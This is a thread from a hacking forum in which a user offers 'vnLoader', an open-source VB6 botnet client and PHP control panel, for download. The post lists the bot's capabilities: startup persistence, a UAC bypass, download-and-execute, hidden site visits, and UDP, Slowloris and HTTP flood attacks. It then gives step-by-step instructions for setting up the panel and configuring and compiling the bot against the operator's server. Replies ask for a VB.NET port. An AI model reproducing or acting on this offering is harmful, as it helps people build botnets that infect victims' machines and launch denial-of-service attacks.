![]() |
|
[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: Visual Basic & .NET Framework (https://sinister.li/Forum-Visual-Basic-NET-Framework) +--- Thread: [OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] (/Thread-OPEN-SOURCE-vnLoader-HTTP-Bot-DL-Exec-Update-Visit-UDP-HTTP-Flood-VB6) |
[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] - Stricker - 10-27-2012 ![]() About the Bot: Coded in VB6 Startup (of course) Mutex (of course) Copy & Paste UAC Bypass Commands: Download & Execute Update Remove Visit Website (visible/hidden) UDP Flood > attacks random ports HTTP Flood > if server is vulnerable to Slowloris -> Slowloris attack > else -> HTTP Get Flood Uses Sockets to connect! About the Webpanel: Coded in PHP ( + a bit Javascript ) High customizable taskcreation Statistics, Botlist, Tasklist, etc. Account system (take a look at the picture below) Screenshots of the Webpanel: Statistics ![]() Botlist ![]() Task creation ![]() Account managements ![]() How to install the Webpanel: 1. Create a mysql database (won't explain how that works) 2. After downloading the source browse to your php files. 3. Open "sql.inc.php" and configure it to your mysql server/ database PHP Code: @mysql_connect
("dbserver", "dbusername", "dbpassword");
@mysql_select_db("dbname");
5. Browse in your Internet Browser to http://yourserver.com/yourwebpanel/ install.php 6. Enter a username and a password for your webpanel and click "Install". Wait until the script is done. How to compile the bot: 1. Open the project in your Visual Basic 6.0 IDE 2. Search for "Form_Load" in Form1 3. Configure it like this. Code: 'FOREXAMPLEOURWEBPANELISHERE:
http://someserver.com/vnloader/
Server="someserver.com" 'Your
Domain(without:"http://"or"www.")
Prefix="/vnLoader/" 'Pathtothe
folderofthewebpanel
Password=
"updateandremovepassword" 'Password
fortheupdatecommand
Mutex="SomethingRandom
Here" 'Mutex
StartUp="Startupkey" 'Startupkey5. ??? 6. Profit Download Link: Source code All Credit Goes To:van1lle For Source And Instruction. Dont Forget To Say Thanks,Rep+ Will Be Appreciated. RE: [OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] - Miklo - 09-16-2013 @Stricker, Is there way that you could create a Code for VBNET 2010 using the same method? Thank you very much for your hardwork btw.. RE: [OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] - hellomen - 09-18-2013 nicely done aswell as for the theme hope too see more from you RE: [OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6] - nnc36 - 09-18-2013 what function of vnloader. i conuse with it |